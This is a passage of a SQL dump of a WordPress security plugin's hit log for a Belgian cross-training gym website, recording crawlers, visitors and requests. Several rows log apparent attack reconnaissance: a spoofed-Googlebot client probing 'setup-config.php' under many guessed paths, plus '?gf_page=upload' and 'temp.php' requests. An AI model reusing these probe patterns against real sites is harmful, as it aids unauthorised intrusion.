(73881, 1496056380.718953, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/news/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73882, 1496057542.130471, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wordpress/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73883, 1496057765.010662, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/web/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73884, 1496057798.096064, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73885, 1496057843.774834, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/test/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73886, 1496058174.284421, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/blog/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73887, 1496058399.701221, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73888, 1496059019.888554, 1538375237, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=13&ved=0ahUKEwjIz5XuhZXUAhVBLFAKHSACByI4ChAWCEwwAg&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2Flequipe%2F&usg=AFQjCNEwoxlHryNYgAimC6M0_H4bYObfZQ', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(73889, 1496059022.699220, 1538375237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(73890, 1496059044.279244, 1538375237, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(73891, 1496059045.758371, 1538375237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(73892, 1496060008.078140, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/home/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73893, 1496061060.971558, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73894, 1496061861.582839, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/new/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73895, 1496062000.287728, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wordpress/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73896, 1496062410.482558, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cms/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73897, 1496065151.480641, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/main/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73898, 1496065234.593510, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/news/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73899, 1496067232.182427, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(73900, 1496067668.951688, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/main/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73901, 1496070297.640355, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(73902, 1496070298.202844, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73903, 1496070298.649914, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73904, 1496070299.096109, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73905, 1496070299.533634, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73906, 1496070299.981209, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73907, 1496070300.540274, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73908, 1496070300.970584, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73909, 1496070301.390472, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73910, 1496070301.933530, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73911, 1496070302.565333, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73912, 1496070316.501462, 2160581054, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/en/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73913, 1496071265.342093, 1055638166, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73914, 1496071269.266793, 1055638166, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73915, 1496074985.962515, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(73916, 1496074989.066050, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73917, 1496074994.701466, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73918, 1496074998.224754, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73919, 1496075002.996462, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73920, 1496075007.581397, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73921, 1496075012.312630, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73922, 1496075031.834673, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73923, 1496076769.478540, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73924, 1496076769.872116, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73925, 1496076775.599386, 2297635928, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73926, 1496076788.327573, 2297635928, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73927, 1496076801.368157, 2297635928, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73928, 1496076806.454499, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73929, 1496076818.847656, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73930, 1496076827.644249, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73931, 1496076832.755228, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73932, 1496076839.349857, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73933, 1496076845.556271, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73934, 1496076859.237334, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73935, 1496076866.674257, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73936, 1496077025.547416, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73937, 1496077025.920184, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(73938, 1496077214.729868, 1489403232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/?gf_page=upload', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(73939, 1496081475.647373, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(73940, 1496081476.781557, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73941, 1496081477.218504, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73942, 1496081477.654425, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73943, 1496081478.072780, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73944, 1496081478.884129, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73945, 1496081481.468342, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73946, 1496081484.079859, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73947, 1496081484.611249, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73948, 1496081485.232080, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73949, 1496081485.664708, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73950, 1496082094.738658, 2637637390, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73951, 1496082095.169895, 2637637390, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73952, 1496082382.700900, 2745959577, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(73953, 1496083792.520221, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(73954, 1496083793.344148, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73955, 1496083794.103915, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73956, 1496083794.547137, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73957, 1496083795.127878, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73958, 1496083799.190448, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73959, 1496083799.724457, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73960, 1496083800.261071, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73961, 1496083800.780485, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73962, 1496083801.285683, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73963, 1496083801.799059, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73964, 1496083802.511489, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73965, 1496083803.050409, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73966, 1496083803.501936, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73967, 1496086533.125081, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73968, 1496086533.614566, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73969, 1496089649.800724, 1374761077, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50'),
(73970, 1496089654.040102, 1374761077, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50'),
(73971, 1496090841.613281, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73972, 1496093107.301275, 1834549080, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0) Gecko/53.0 Firefox/53.0'),
(73973, 1496093109.559299, 1834549080, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0.2) Gecko/53.0.2 Firefox/53.0.2'),
(73974, 1496093123.141583, 1834549080, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0) Gecko/53.0 Firefox/53.0'),
(73975, 1496093125.694278, 1834549080, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/prix/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0) Gecko/53.0 Firefox/53.0'),
(73976, 1496093159.513488, 1834549080, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0) Gecko/53.0 Firefox/53.0'),
(73977, 1496093161.342304, 1834549080, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0) Gecko/53.0 Firefox/53.0'),
(73978, 1496093230.928079, 1834549080, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0) Gecko/53.0 Firefox/53.0'),
(73979, 1496093238.115751, 1834549080, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0) Gecko/53.0 Firefox/53.0'),
(73980, 1496093239.487375, 1834549080, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0) Gecko/53.0 Firefox/53.0'),
(73981, 1496093255.141760, 1834549080, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0) Gecko/53.0 Firefox/53.0'),
(73982, 1496093263.978057, 1834549080, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0) Gecko/53.0 Firefox/53.0'),
(73983, 1496093265.204872, 1834549080, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/prix/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:53.0) Gecko/53.0 Firefox/53.0'),
(73984, 1496095054.595677, 786801765, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(73985, 1496096612.793216, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73986, 1496097225.131597, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73987, 1496097854.203372, 2637637583, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73988, 1496097854.758063, 2637637583, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73989, 1496099345.118645, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73990, 1496125322.365773, 2637637376, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73991, 1496125322.366609, 2637637376, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73992, 1496136292.930942, 3154485134, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(73993, 1496136293.653336, 3154485134, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73994, 1496136294.204977, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73995, 1496136294.735297, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73996, 1496136295.239744, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73997, 1496136295.745968, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73998, 1496136296.364801, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73999, 1496136296.970111, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74000, 1496136297.513093, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74001, 1496136298.034039, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74002, 1496136298.529600, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74003, 1496136474.221030, 1463941451, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9'),
(74004, 1496140287.300755, 2857634197, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/temp.php', 'http://crosstrainingcenter.be/temp.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
